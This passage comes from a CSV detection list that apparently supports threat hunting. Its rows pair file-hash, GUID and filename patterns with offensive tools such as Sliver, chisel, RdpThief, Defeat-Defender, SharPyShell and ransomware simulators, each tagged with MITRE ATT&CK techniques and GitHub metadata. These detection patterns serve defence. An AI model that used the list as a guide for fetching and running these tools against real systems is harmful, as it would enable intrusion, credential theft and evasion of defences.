bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" "*d0733560ad65a7123d380f6be4007ce0f0e56356f9dc1729e628342bb96892ab*",".{0,1000}d0733560ad65a7123d380f6be4007ce0f0e56356f9dc1729e628342bb96892ab.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*d0844ed23aea55010cdfbca9d818cbf3baaa222ee8b30281b3534e60146583ff*",".{0,1000}d0844ed23aea55010cdfbca9d818cbf3baaa222ee8b30281b3534e60146583ff.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*d091e408c0c5068b86bb69d17e91c5a7d6da46c0bd4101aa14f136246aed7f51*",".{0,1000}d091e408c0c5068b86bb69d17e91c5a7d6da46c0bd4101aa14f136246aed7f51.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" 
"*d09ccee4-pass-word-0000-98677e2356fd*",".{0,1000}d09ccee4\-pass\-word\-0000\-98677e2356fd.{0,1000}","offensive_tool_keyword","REC2 ","REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/g0h4n/REC2","1","0","N/A","10","10","126","18","2024-02-22T14:02:24Z","2023-09-25T20:39:59Z" "*d0d03a0ae4722535a0e1d5d0c8385ce42015511e68d960fadef4b4eaf5942feb*",".{0,1000}d0d03a0ae4722535a0e1d5d0c8385ce42015511e68d960fadef4b4eaf5942feb.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*d0ebb728926cce530040e046a8ea2f47e01158581cb0b5cccddc91007b421f6c*",".{0,1000}d0ebb728926cce530040e046a8ea2f47e01158581cb0b5cccddc91007b421f6c.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*d0f189f26ac306b46efc221359e27629eb76c54a4cf0cec4e3731ab306bee0af*",".{0,1000}d0f189f26ac306b46efc221359e27629eb76c54a4cf0cec4e3731ab306bee0af.{0,1000}","offensive_tool_keyword","Defeat-Defender","script to dismantle complete windows defender protection and even bypass tamper protection - Disable Windows-Defender Permanently.","T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/swagkarna/Defeat-Defender-V1.2.0","1","0","N/A","10","10","1364","299","2023-10-20T17:55:09Z","2020-12-10T07:22:06Z" 
"*d0fd70c59cf45c5c1eb9c73ba1ccfa433d715a3a57b1312a26a02c60210cbfb8*",".{0,1000}d0fd70c59cf45c5c1eb9c73ba1ccfa433d715a3a57b1312a26a02c60210cbfb8.{0,1000}","offensive_tool_keyword","RdpThief","Extracting Clear Text Passwords from mstsc.exe using API Hooking.","T1056.004 - T1110 - T1563.002","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/0x09AL/RdpThief","1","0","N/A","10","10","1073","343","2019-11-13T14:13:52Z","2019-11-03T17:54:38Z" "*d162d2e96da627fac5a93d5e6faf379aff092bbd*",".{0,1000}d162d2e96da627fac5a93d5e6faf379aff092bbd.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","10","10","735","120","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z" "*d16d7eaa9f5abcafb83da10a9b729f7c9b090bf209fd7b9ea820ed942c328d60*",".{0,1000}d16d7eaa9f5abcafb83da10a9b729f7c9b090bf209fd7b9ea820ed942c328d60.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*d18b648dfee767e09a9c580a9bd0c60edc5f9aa4718e41c15434c47630023efb*",".{0,1000}d18b648dfee767e09a9c580a9bd0c60edc5f9aa4718e41c15434c47630023efb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*D19BD978-267A-4BF0-85CC-851E280FF4C2*",".{0,1000}D19BD978\-267A\-4BF0\-85CC\-851E280FF4C2.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation tools","https://github.com/daem0nc0re/VectorKernel/","1","0","N/A","10","3","291","39","2024-04-24T09:46:46Z","2023-11-23T12:36:31Z" "*D1AE1ACF-8AA2-4935-ACDF-EC22BAE2DF76*",".{0,1000}D1AE1ACF\-8AA2\-4935\-ACDF\-EC22BAE2DF76.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","0","N/A","7","7","619","83","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z" "*d1b43d39823d14ec9524f63fa0125ad9606d5c3e32d8e10d34a25214c56d308f*",".{0,1000}d1b43d39823d14ec9524f63fa0125ad9606d5c3e32d8e10d34a25214c56d308f.{0,1000}","offensive_tool_keyword","TunnelVision","TunnelVision uses DHCP option 121 to manipulate routing tables and decloak VPN traffic","T1557 - T1498.003","TA0009 - TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/leviathansecurity/TunnelVision","1","0","N/A","9","7","N/A","N/A","N/A","N/A" 
"*d1b7993dc84243e12f8b4650de9b71a85f5a3751c085d96f7211129c5e5f4eb0*",".{0,1000}d1b7993dc84243e12f8b4650de9b71a85f5a3751c085d96f7211129c5e5f4eb0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*d1b8e13cf05c57e811ee4c90c985c018a7d1e937eca0f5860fecf36601032630*",".{0,1000}d1b8e13cf05c57e811ee4c90c985c018a7d1e937eca0f5860fecf36601032630.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*D1CCDA5D-E460-4ACC-B51A-730DE8F0ECF3*",".{0,1000}D1CCDA5D\-E460\-4ACC\-B51A\-730DE8F0ECF3.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*d1cd42f8663905f5e307c82b421093d7eb93b2d2a8d50f752ff0b8628b2bbc5a*",".{0,1000}d1cd42f8663905f5e307c82b421093d7eb93b2d2a8d50f752ff0b8628b2bbc5a.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*d1d4d168eeedd0867537ba4cf5befd1ea7adab62843d21088e6c51e27dec34c5*",".{0,1000}d1d4d168eeedd0867537ba4cf5befd1ea7adab62843d21088e6c51e27dec34c5.{0,1000}","offensive_tool_keyword","EnableAllTokenPrivs","Enable or Disable TokenPrivilege(s)","T1134 - T1055","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/xvt-void/EnableAllTokenPrivs","1","0","N/A","7","1","11","3","2024-02-18T20:55:05Z","2024-02-17T15:39:25Z" "*d1d8362d21a381b0703d4586b73ce78d5332507c62e1d90eb8eb83555db1d6c8*",".{0,1000}d1d8362d21a381b0703d4586b73ce78d5332507c62e1d90eb8eb83555db1d6c8.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*d1f5e8ada7197e67b7bdede4827104e286c63f24407bb9eef80cc7c2bd2e065f*",".{0,1000}d1f5e8ada7197e67b7bdede4827104e286c63f24407bb9eef80cc7c2bd2e065f.{0,1000}","offensive_tool_keyword","ShellServe","Multi-client network fileserver with integrated shell functionality crafted in C using system calls for efficient and direct file and command processing","T1059 - T1505 - T1046 - T1569","TA0002 - TA0007 - TA0003","N/A","N/A","Data 
Exfiltration","https://github.com/7etsuo/ShellServe","1","0","N/A","6","1","N/A","N/A","N/A","N/A" "*d1fb14a96b35b807b6b2315bc198b778f0ced472685c708d757a5219ae06bba1*",".{0,1000}d1fb14a96b35b807b6b2315bc198b778f0ced472685c708d757a5219ae06bba1.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*d1fccb8acadbdefaf27f8680c74c40dba94e52734dd9704d38c0de7b10066f14*",".{0,1000}d1fccb8acadbdefaf27f8680c74c40dba94e52734dd9704d38c0de7b10066f14.{0,1000}","offensive_tool_keyword","lnk2pwn","Malicious Shortcut(.lnk) Generator","T1204 - T1059.007","TA0001 - TA0002","N/A","N/A","Phishing","https://github.com/it-gorillaz/lnk2pwn","1","0","N/A","8","2","154","32","2018-11-23T17:18:49Z","2018-11-23T00:12:48Z" "*D1rkInject.cpp*",".{0,1000}D1rkInject\.cpp.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","9","2","154","27","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" "*D1rkInject.exe*",".{0,1000}D1rkInject\.exe.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","9","2","154","27","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" "*D1rkInject.iobj*",".{0,1000}D1rkInject\.iobj.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and 
stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","9","2","154","27","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" "*D1rkInject.log*",".{0,1000}D1rkInject\.log.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","9","2","154","27","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" "*D1rkInject.sln*",".{0,1000}D1rkInject\.sln.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","9","2","154","27","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" "*D1rkInject.vcxproj*",".{0,1000}D1rkInject\.vcxproj.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","9","2","154","27","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" "*D1rkInject-main*",".{0,1000}D1rkInject\-main.{0,1000}","offensive_tool_keyword","D1rkInject","Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state","T1055 - T1055.012 - T1055.002 - T1574.002","TA0002 - TA0005","N/A","N/A","Defense 
Evasion","https://github.com/TheD1rkMtr/D1rkInject","1","1","N/A","9","2","154","27","2023-08-02T02:45:46Z","2023-08-02T02:13:55Z" "*D210570B-F1A0-4B66-9301-F7A54978C178*",".{0,1000}D210570B\-F1A0\-4B66\-9301\-F7A54978C178.{0,1000}","offensive_tool_keyword","Hypnos","indirect syscalls - the Win API functions are not hooked by AV/EDR - bypass EDR detections","T1055.012 - T1136.001 - T1070.004 - T1055.001","TA0005 - TA0002 - TA0003","N/A","N/A","Defense Evasion","https://github.com/CaptainNox/Hypnos","1","0","N/A","10","1","50","6","2024-02-12T17:51:24Z","2023-07-11T09:07:10Z" "*d24cfba28aeecfecb7698350ca04c4ed07f6a9b88b212bbcbaacd168372fa980*",".{0,1000}d24cfba28aeecfecb7698350ca04c4ed07f6a9b88b212bbcbaacd168372fa980.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*d27b61fa43a50888d967bd4fcc32e9c760086b4240a790561084298238be16ee*",".{0,1000}d27b61fa43a50888d967bd4fcc32e9c760086b4240a790561084298238be16ee.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*d28b91e8fef0277673acca0c19b034b4bcfdbd730760714fe673b535282b5a01*",".{0,1000}d28b91e8fef0277673acca0c19b034b4bcfdbd730760714fe673b535282b5a01.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - 
TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*d29dcb85619d3c9f31070257e1abf0d1f2f2e23c7c3769a0c7aca9bdc16c2517*",".{0,1000}d29dcb85619d3c9f31070257e1abf0d1f2f2e23c7c3769a0c7aca9bdc16c2517.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*d2b0e14706fc0c11bdc7d1b35463150bf11c12dbf63045d79c361f23abde33dc*",".{0,1000}d2b0e14706fc0c11bdc7d1b35463150bf11c12dbf63045d79c361f23abde33dc.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*d2d99c2dcb17923e9ce1d91e16491527edcdd945aa68e54d83bc6fc927274b05*",".{0,1000}d2d99c2dcb17923e9ce1d91e16491527edcdd945aa68e54d83bc6fc927274b05.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://x.com/cyb3rops/status/1776924344481984944","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - 
TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","rule author: @cyb3rops - link: https://x.com/cyb3rops/status/1776924344481984944","10","10","N/A","N/A","N/A","N/A" "*d2d99c2dcb17923e9ce1d91e16491527edcdd945aa68e54d83bc6fc927274b05*",".{0,1000}d2d99c2dcb17923e9ce1d91e16491527edcdd945aa68e54d83bc6fc927274b05.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://github.com/Neo23x0/signature-base/blob/07daba7eb7bc44e6f73e199c6b9892241ab1b3d7/yara/bkdr_xz_util_cve_2024_3094.yar#L2","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","https://www.virustotal.com/gui/file/d2d99c2dcb17923e9ce1d91e16491527edcdd945aa68e54d83bc6fc927274b05","10","10","N/A","N/A","N/A","N/A" "*d2f0e9bf854c80b08a355e367d8f8eefb6defc64c0c42e3a970bbd0aa9abfb8d*",".{0,1000}d2f0e9bf854c80b08a355e367d8f8eefb6defc64c0c42e3a970bbd0aa9abfb8d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*d2h5aXNwZW5uc3RhdGVzb2JhZGF0Zm9vdGJhbGw*",".{0,1000}d2h5aXNwZW5uc3RhdGVzb2JhZGF0Zm9vdGJhbGw.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","can be used for data exfiltration simulation","8","6","587","136","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z" "*d2hvYW1p*",".{0,1000}d2hvYW1p.{0,1000}","offensive_tool_keyword","NetLoader","Loads any C# binary in 
memory - patching AMSI + ETW","T1055.012 - T1112 - T1562.001","TA0005 - TA0002","N/A","N/A","Exploitation tools - Defense Evasion","https://github.com/Flangvik/NetLoader","1","0","N/A","10","8","759","138","2021-10-03T16:41:03Z","2020-05-05T15:20:16Z" "*d3074edd15856a4138978c24a2b4ba70f6a84abee3db440a710e6b8a2fd597d8*",".{0,1000}d3074edd15856a4138978c24a2b4ba70f6a84abee3db440a710e6b8a2fd597d8.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*D30C9D6B-1F45-47BD-825B-389FE8CC9069*",".{0,1000}D30C9D6B\-1F45\-47BD\-825B\-389FE8CC9069.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","0","N/A","8","3","298","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z" "*d323294bc92b8ab3dc05085a795881b3d75c5b1128911bf7478be1fe39d60482*",".{0,1000}d323294bc92b8ab3dc05085a795881b3d75c5b1128911bf7478be1fe39d60482.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*d3290c562ad2740c0ddfd8cee2c2239055cf1491f54127f48a4e64549145c6e5*",".{0,1000}d3290c562ad2740c0ddfd8cee2c2239055cf1491f54127f48a4e64549145c6e5.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*d3366dc09c1ec4e93c9a40f4de0f96088786b6fb44b3fafb3d648a4b6342b596*",".{0,1000}d3366dc09c1ec4e93c9a40f4de0f96088786b6fb44b3fafb3d648a4b6342b596.{0,1000}","offensive_tool_keyword","OffensiveCpp","C/C++ snippets that can be handy in specific offensive scenarios","T1055 - T1047 - T1105 - T1117 - T1129 - T1135 - T1203","TA0002 - TA0003 - TA0006 - TA0007 - TA0009","N/A","N/A","Exploitation tools","https://github.com/lsecqt/OffensiveCpp","1","0","N/A","10","6","524","52","2024-04-05T14:21:15Z","2023-04-05T09:39:33Z" "*d38210acb6d0568559041036abd033953c4080170e1ea9cf5d4d8499b54141b7*",".{0,1000}d38210acb6d0568559041036abd033953c4080170e1ea9cf5d4d8499b54141b7.{0,1000}","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense 
Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","391","60","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*d384ec908583b271588a27748850e4cadf9d8b55a4afdfa54170738da54fc4ef*",".{0,1000}d384ec908583b271588a27748850e4cadf9d8b55a4afdfa54170738da54fc4ef.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","C2 - Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","0","file_hash","10","10","22","3","2024-03-21T17:40:39Z","2024-01-31T23:40:16Z" "*d39a670a35257b1686b0f6d6b27fab1691839e925ba18c5c30c973ea70a31391*",".{0,1000}d39a670a35257b1686b0f6d6b27fab1691839e925ba18c5c30c973ea70a31391.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" 